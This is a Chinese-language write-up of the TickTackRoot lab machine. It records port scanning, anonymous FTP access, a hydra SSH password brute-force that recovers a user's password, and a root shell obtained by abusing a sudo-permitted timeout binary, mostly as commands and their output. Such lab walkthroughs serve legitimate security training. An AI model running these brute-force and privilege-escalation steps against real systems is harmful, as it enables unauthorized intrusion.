TickTackRoot

image

信息搜集

192.168.43.58

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
┌──(root㉿kali)-[~]
└─# rustscan -a 192.168.43.58 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.43.58:21
Open 192.168.43.58:22
Open 192.168.43.58:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.58
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-20 02:10 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.00s elapsed
Initiating ARP Ping Scan at 02:10
Scanning 192.168.43.58 [1 port]
Completed ARP Ping Scan at 02:10, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:10
Completed Parallel DNS resolution of 1 host. at 02:10, 0.06s elapsed
DNS resolution of 1 IPs took 0.06s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:10
Scanning 192.168.43.58 [3 ports]
Discovered open port 22/tcp on 192.168.43.58
Discovered open port 80/tcp on 192.168.43.58
Discovered open port 21/tcp on 192.168.43.58
Completed SYN Stealth Scan at 02:10, 0.02s elapsed (3 total ports)
Initiating Service scan at 02:10
Scanning 3 services on 192.168.43.58
Completed Service scan at 02:10, 11.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.58
NSE: Script scanning 192.168.43.58.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:10
NSE: [ftp-bounce 192.168.43.58:21] PORT response: 500 Illegal PORT command.
Completed NSE at 02:10, 0.45s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.03s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.00s elapsed
Nmap scan report for 192.168.43.58
Host is up, received arp-response (0.00056s latency).
Scanned at 2026-04-20 02:10:11 EDT for 13s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 10671 Oct 03 2024 index.html
|_drwxr-xr-x 2 0 0 4096 Oct 07 2024 login
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.43.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 5c:38:6e:8a:4b:bb:b4:2a:ca:cb:3a:94:62:9c:aa:7e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLZUW2Q479diAO8OLSRUgHhkJX4pY63qqUmuo4zStvBN9T/HpEyZNGXWYdpZlEQtxXBqq/VoTd8mVb61ri7jw00=
| 256 06:c4:ea:41:7d:c3:4b:f7:8c:68:19:6b:5c:23:e4:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMEPGyQ926eLS6k+yvt7edLlk4BeODs/OcqKBfEVqyex
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:5B:6F:F3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/20%OT=21%CT=%CU=38839%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=69E5C350%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 12.238 days (since Tue Apr 7 20:27:05 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms 192.168.43.58

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:10
Completed NSE at 02:10, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
Raw packets sent: 30 (2.162KB) | Rcvd: 44 (3.350KB)

枚举

ftp

ftp存在匿名登录,里面有一个login.txt,没有用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~]
└─# ftp 192.168.43.58
Connected to 192.168.43.58.
220 Bienvenido Robin
Name (192.168.43.58:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||24619|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 10671 Oct 03 2024 index.html
drwxr-xr-x 2 0 0 4096 Oct 07 2024 login
226 Directory send OK.
ftp> cd login
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44347|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 14 Oct 07 2024 login.txt
226 Directory send OK.
ftp> get login.txt
local: login.txt remote: login.txt
229 Entering Extended Passive Mode (|||35992|)
150 Opening BINARY mode data connection for login.txt (14 bytes).
100% |*********************************************************************************| 14 16.19 KiB/s 00:00 ETA
226 Transfer complete.
14 bytes received in 00:00 (5.85 KiB/s)
ftp>

在登录的时候显示了欢迎Robin

image

hydra枚举Robin的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/opt/CVE/TinyFileManager-File-Upload-RCE-Exploit]
└─# hydra -l robin -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.58 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-20 02:14:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.43.58:22/
[22][ssh] host: 192.168.43.58 login: robin password: babyblue
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 23 final worker threads did not complete until end.
[ERROR] 23 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-20 02:15:31

成功获取到了登录凭证

使用ssh连接到robin用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(root㉿kali)-[/opt/CVE/TinyFileManager-File-Upload-RCE-Exploit]
└─# ssh robin@192.168.43.58
The authenticity of host '192.168.43.58 (192.168.43.58)' can't be established.
ED25519 key fingerprint is SHA256:AbcLfoRO5xqCMsRNSIrZgMMbg/qvciy2F5kfxTJLfMA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.43.58' (ED25519) to the list of known hosts.
robin@192.168.43.58's password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of mar 15 oct 2024 08:45:45 UTC

System load: 0.06 Processes: 113
Usage of /: 51.1% of 4.93GB Users logged in: 1
Memory usage: 9% IPv4 address for enp0s3: 192.168.18.52
Swap usage: 0%

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

El mantenimiento de seguridad expandido para Applications está desactivado

Se pueden aplicar 3 actualizaciones de forma inmediata.
Para ver estas actualizaciones adicionales, ejecute: apt list --upgradable

Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales.
Vea https://ubuntu.com/esm o ejecute «sudo pro status»


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 15 08:45:45 2024 from 192.168.18.48
robin@TheHackersLabs-Ticktackroot:~$ id
uid=1001(robin) gid=1001(robin) groups=1001(robin),100(users)
robin@TheHackersLabs-Ticktackroot:~$

提权

robin -> root

1
2
3
4
5
6
robin@TheHackersLabs-Ticktackroot:~$ sudo -l
Matching Defaults entries for robin on TheHackersLabs-Ticktackroot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User robin may run the following commands on TheHackersLabs-Ticktackroot:
(ALL) NOPASSWD: /usr/bin/timeout_suid

timeout 命令通常用于在限定的时间内运行指定的程序。如果这个二进制文件被赋予了 sudo 权限(或者它本身带有 SUID 位),我们可以利用它来启动一个 root 权限的交互式 Shell。

1
sudo /usr/bin/timeout_suid 7d /bin/sh -p
  • 7d:让 timeout 维持运行 7 天

image